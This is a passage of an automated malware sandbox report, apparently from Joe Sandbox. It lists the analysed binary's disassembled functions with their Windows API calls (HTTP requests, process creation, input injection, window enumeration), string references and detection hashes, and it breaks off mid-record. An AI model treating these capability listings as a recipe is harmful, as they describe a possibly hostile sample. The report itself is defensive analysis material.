_wcscmp.LIBCMT ref: 007C9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C9211

Strings

smallicons, xrefs: 007C91D9
SHELLDLL_DefView, xrefs: 007C9190
list, xrefs: 007C91F3
largeicons, xrefs: 007C91A5
details, xrefs: 007C91BF

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: a90834fa4cb99d053807b2e20f2f4d4d55a20007bbc5680665912783c194e0e2
Instruction ID: c549e1e916959dd956adfa38d5b18b7cf11c637f614f11f9fc521d2e602fde52
Opcode Fuzzy Hash: a90834fa4cb99d053807b2e20f2f4d4d55a20007bbc5680665912783c194e0e2
Instruction Fuzzy Hash: F311E776648317FAFA113624FC0FEA77B9CFF15720B20002EFA10E45D2EE6D58919554

Function 007E88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E88D7
CoInitialize.OLE32(00000000), ref: 007E8904
CoUninitialize.OLE32 ref: 007E890E
GetRunningObjectTable.OLE32(00000000,?), ref: 007E8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 007E8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00802C0C), ref: 007E8B6F
CoGetObject.OLE32(?,00000000,00802C0C,?), ref: 007E8B92
SetErrorMode.KERNEL32(00000000), ref: 007E8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E8C25
VariantClear.OLEAUT32(?), ref: 007E8C35

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 838c356aee0b47a93d33b865b6ab2ead394e155b89ef5a7462b06ebcf307ffdf
Instruction ID: 6efc67fbba378c056cee2b408c310c7a341da7a245b6f579a328595a366bc50b
Opcode Fuzzy Hash: 838c356aee0b47a93d33b865b6ab2ead394e155b89ef5a7462b06ebcf307ffdf
Instruction Fuzzy Hash: 17C153B1209345EFC740DF25C88492AB7E9FF89348F00896DF98A9B261DB75ED05CB52

Function 007D7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007D7A6C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: e73c40bd7f0cae4d0ee4d9fec1bbabe6e91b8c4d15c9e02bf3c0abd9c18629dd
Instruction ID: 085567609dbbe96fd7128ff31ba6489064e15fbdbbba3015c2f10c7ed614c456
Opcode Fuzzy Hash: e73c40bd7f0cae4d0ee4d9fec1bbabe6e91b8c4d15c9e02bf3c0abd9c18629dd
Instruction Fuzzy Hash: 20B19E71914219DFDB04DFA4D885BBEB7B8FF09321F24442AE605E7351E738A941CBA0

Function 007D11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007D11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0268,?,00000001), ref: 007D1204
GetWindowThreadProcessId.USER32(00000000), ref: 007D120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0268,?,00000001), ref: 007D121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 007D122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0268,?,00000001), ref: 007D1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0268,?,00000001), ref: 007D1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0268,?,00000001), ref: 007D129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0268,?,00000001), ref: 007D12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0268,?,00000001), ref: 007D12BC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
Instruction ID: 5c7ab2c888bab46a1e416725166472e16d71838fe84161e5937c9fec30f0d4fc
Opcode Fuzzy Hash: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
Instruction Fuzzy Hash: 09318D75700204FBEB10DF58ED88B797BB9BF98311F508526F900CA2A0EB79AD40CB65

Function 0077FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077FAA6
OleUninitialize.OLE32(?,00000000), ref: 0077FB45
UnregisterHotKey.USER32(?), ref: 0077FC9C
DestroyWindow.USER32(?), ref: 007B45D6
FreeLibrary.KERNEL32(?), ref: 007B463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B4668

Strings

close all, xrefs: 0077FAA1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 24da08859ab9ff91db7aeef3d57ca1549e0acadbe236254ac54149be9ea1112e
Instruction ID: c9746acae675eab6420c853cd7e594e1a82b670e3d2223a60ed4226e0541eed6
Opcode Fuzzy Hash: 24da08859ab9ff91db7aeef3d57ca1549e0acadbe236254ac54149be9ea1112e
Instruction Fuzzy Hash: 36A15C70701212CFCB29EF14C999B69F364BF05754F1582ADE90AAB262DB38AC16CF50

Function 007CA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,007CA439), ref: 007CA377

Strings

CLASSNN, xrefs: 007CA119
INSTANCE, xrefs: 007CA285
CLASS, xrefs: 007CA0F6
TEXT, xrefs: 007CA2AE
NAME, xrefs: 007CA1A9
REGEXPCLASS, xrefs: 007CA13C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 14447006cc543b58e43102e9e0d1e2e3b7bb9722e50532e89f98558d7975e0a8
Instruction ID: 1b68b3ec5a384aa45bde6d9ea431b83e2738da6e375511dea02dd9475f9c6069
Opcode Fuzzy Hash: 14447006cc543b58e43102e9e0d1e2e3b7bb9722e50532e89f98558d7975e0a8
Instruction Fuzzy Hash: 3B919E30A0061AEACF08EFA0D45AFEDBBB4FF04309F54811DE949A3141DB386999DBD1

Function 00772E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00772EAE

Part of subcall function 00771DB3: GetClientRect.USER32(?,?), ref: 00771DDC
Part of subcall function 00771DB3: GetWindowRect.USER32(?,?), ref: 00771E1D
Part of subcall function 00771DB3: ScreenToClient.USER32(?,?), ref: 00771E45

GetDC.USER32 ref: 007ACD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ACD45
SelectObject.GDI32(00000000,00000000), ref: 007ACD53
SelectObject.GDI32(00000000,00000000), ref: 007ACD68
ReleaseDC.USER32(?,00000000), ref: 007ACD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ACDFB

Strings

U, xrefs: 007ACCD0

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d22c3123f4084e143fa3d1b4a9c3c5df50cf4f0372fada7e9e86ec12cbf01713
Instruction ID: 3acefa4043120405d3cd42d7322399da53594a50ebad933838b4c3d5f943d4b4
Opcode Fuzzy Hash: d22c3123f4084e143fa3d1b4a9c3c5df50cf4f0372fada7e9e86ec12cbf01713
Instruction Fuzzy Hash: B971E831500205EFCF268F64CC84ABA7BB5FF8A360F14877AED595A266C7398C51DB60

Function 007E1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E1B10
InternetCloseHandle.WININET(00000000), ref: 007E1B57

Part of subcall function 007E2483: GetLastError.KERNEL32(?,?,007E1817,00000000,00000000,00000001), ref: 007E2498
Part of subcall function 007E2483: SetEvent.KERNEL32(?,?,007E1817,00000000,00000000,00000001), ref: 007E24AD

Strings

, xrefs: 007E1B01

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 2cb9893f3e5d2a53c2ccb6c16135e828121dfa87cce8bc2dabeb2745cfb7f589
Instruction ID: d7484ecb838977d7a0333fb2a9307368c9f774277986a9fe2cc0a78672d0636a
Opcode Fuzzy Hash: 2cb9893f3e5d2a53c2ccb6c16135e828121dfa87cce8bc2dabeb2745cfb7f589
Instruction Fuzzy Hash: A64162B1502258BFEB119F61CC8AFBA77ACFF08354F408126F9059A141EB789E44DBA4

Function 007E8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FF910), ref: 007E8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FF910), ref: 007E8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E8ED6
SysFreeString.OLEAUT32(?), ref: 007E8F00

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 4824c2ede9f8e34b5168470e559d4216193ba334b170773f8ca4b77ba1f262ca
Instruction ID: 48a941eec5d8529565a588bbe9f59f94627338c76d68a9e44f78e5fd1729fdae
Opcode Fuzzy Hash: 4824c2ede9f8e34b5168470e559d4216193ba334b170773f8ca4b77ba1f262ca
Instruction Fuzzy Hash: 5EF16D71A01209EFCF44DF95C888EAEB7B9FF49314F108498FA09AB251DB35AE45CB51

Function 007EF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007EF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007EFA7C
CloseHandle.KERNEL32(?), ref: 007EFAAB
CloseHandle.KERNEL32(?), ref: 007EFB22

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 702313f29d7ba0ec3ee8afd8ebb9954e377f439f926284bfd03b7aa45bade6fd
Instruction ID: c2ad4b511cacc599d9ad6680668a94c2a0acae49c9d8229df687622f3fb04a34
Opcode Fuzzy Hash: 702313f29d7ba0ec3ee8afd8ebb9954e377f439f926284bfd03b7aa45bade6fd
Instruction Fuzzy Hash: CBE1BE71205340DFCB14EF25C885B6ABBE1EF89354F14856DF8998B2A2DB39EC41CB52

Function 007D4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007D466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3697,?), ref: 007D468B

Part of subcall function 007D466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3697,?), ref: 007D46A4

Part of subcall function 007D4A31: GetFileAttributesW.KERNEL32(?,007D370B), ref: 007D4A32

lstrcmpiW.KERNEL32(?,?), ref: 007D4D40
_wcscmp.LIBCMT ref: 007D4D5A
MoveFileW.KERNEL32(?,?), ref: 007D4D75

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 30f4fb0df5080d3a8d38b35551d80ae513608765aafef5348109a2b759066f92
Instruction ID: 6ba237c84d753ffd9da661249b8ddc25cdb4c9120fd518be43c0588d2563eba1
Opcode Fuzzy Hash: 30f4fb0df5080d3a8d38b35551d80ae513608765aafef5348109a2b759066f92
Instruction Fuzzy Hash: A95165B25083859BC724EBA0D8859DF73ECAF85350F40492FF289D3251EF78A588C766

Function 007F8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F86FF

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: cded31c83bcc56c16ea5afd4765adc33e1e9d767d4d2d071670fa58825d6a0af
Instruction ID: 3259d20ebc46a59642da0d3537018eff6870abcfcc20aa7b4fd4e5fa030c3372
Opcode Fuzzy Hash: cded31c83bcc56c16ea5afd4765adc33e1e9d767d4d2d071670fa58825d6a0af
Instruction Fuzzy Hash: F2518131610248FEDF609B68CC89FB97B64FB05360F604115FB14EA3A2CF79A990DB56

Function 00772B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC370
DestroyIcon.USER32(00000000), ref: 007AC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC39C
DestroyIcon.USER32(?), ref: 007AC3AB

Part of subcall function 007FA4AF: DeleteObject.GDI32(00000000), ref: 007FA4E8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 7863fd4a19821f1dd4524cfd0d338c53676cc85846422fab82e873eb3433f980
Instruction ID: f91cf8ade211bc935270fa3a75b87aef0a414bc70fc44115c92ea20ae58e0595
Opcode Fuzzy Hash: 7863fd4a19821f1dd4524cfd0d338c53676cc85846422fab82e873eb3433f980
Instruction Fuzzy Hash: 2E517970A00209EFDF20DF64CC45BAA7BA5FF58350F108628F916972A1DB78AD91DB60

Function 007C966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007CA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CA84C
Part of subcall function 007CA82C: GetCurrentThreadId.KERNEL32 ref: 007CA853
Part of subcall function 007CA82C: AttachThreadInput.USER32(00000000,?,007C9683,?,00000001), ref: 007CA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 007C968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007C96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007C96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 007C96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007C96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 007C96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007C96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007C96FB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 3e3cbf1b9338559fe6500924df054b5b8cd148a0b01954ee256ce8f78ccd8769
Instruction ID: 0f0a0a85e41418291b82a1c7af30aabc717c603c4790330014aceb46e85feccf
Opcode Fuzzy Hash: 3e3cbf1b9338559fe6500924df054b5b8cd148a0b01954ee256ce8f78ccd8769
Instruction Fuzzy Hash: 7A11ACB1910218BBF6106B609C89F7A3B2DEF4C755F104429F244AB1A0CDB65C10DAA8

Function 007C8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C853C,00000B00,?,?), ref: 007C892A
HeapAlloc.KERNEL32(00000000,?,007C853C,00000B00,?,?), ref: 007C8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C853C,00000B00,?,?), ref: 007C8946
GetCurrentProcess.KERNEL32(?,00000000,?,007C853C,00000B00,?,?), ref: 007C894E
DuplicateHandle.KERNEL32(00000000,?,007C853C,00000B00,?,?), ref: 007C8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C853C,00000B00,?,?), ref: 007C8961
GetCurrentProcess.KERNEL32(007C853C,00000000,?,007C853C,00000B00,?,?), ref: 007C8969
DuplicateHandle.KERNEL32(00000000,?,007C853C,00000B00,?,?), ref: 007C896C
CreateThread.KERNEL32(00000000,00000000,007C8992,00000000,00000000,00000000), ref: 007C8986

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ea325faa6987d3bb7e0c072ff07e3f9ef17b2d61a770c53bbc678c3352f4aab7
Instruction ID: 33e15ad81b58785bb86dbebaf27507040df07920949da0a0f030dc58ee26d01d
Opcode Fuzzy Hash: ea325faa6987d3bb7e0c072ff07e3f9ef17b2d61a770c53bbc678c3352f4aab7
Instruction Fuzzy Hash: F401A8B5240308FFE610ABA5DC89F6B3BACEF89711F408425FA05DB2A1CA749C10CA25

Function 007E9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 007E9BA4, 007E9EC8
Not an Object type, xrefs: 007E9B7B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
